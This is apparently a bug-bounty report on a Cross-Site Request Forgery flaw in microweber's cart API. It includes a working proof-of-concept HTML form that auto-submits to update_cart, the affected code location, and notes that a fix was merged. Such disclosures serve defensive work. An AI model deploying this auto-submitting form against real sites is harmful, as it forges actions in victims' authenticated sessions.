Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Jul 20th 2021

✍️ Description

microweber is vulnerable to Cross-site request forgery. The app is not checking the CSRF token when adding new products to the cart.

🕵️‍♂️ Proof of Concept

HTML content:

<form id="form" action="http://localhost/api/update_cart" method="POST" >
  <input type="text" name="for" value="content">
  <input type="text" name="for_id" value="1">
  <input type="text" name="price" value="100">
  <input type="submit"> 
</form>

<script>
  setTimeout(() => {
    form.submit();
  }, 2000);
</script>

Save the above content into an HTML file.
Open the file on the browser and check the cart.

PoC video.

💥 Impact

When a victim access a malicious page, it is possible to add products to the victim's cart.

Occurences

CartManager.php L562

We have contacted a member of the microweber team and are waiting to hear back 2 months ago

Peter Ivanov confirmed that a fix has been merged on 781811 14 days ago

Peter Ivanov has been awarded the fix bounty

We have contacted a member of the microweber team and are waiting to hear back 2 months ago

Peter Ivanov confirmed that a fix has been merged on 781811 14 days ago

Peter Ivanov has been awarded the fix bounty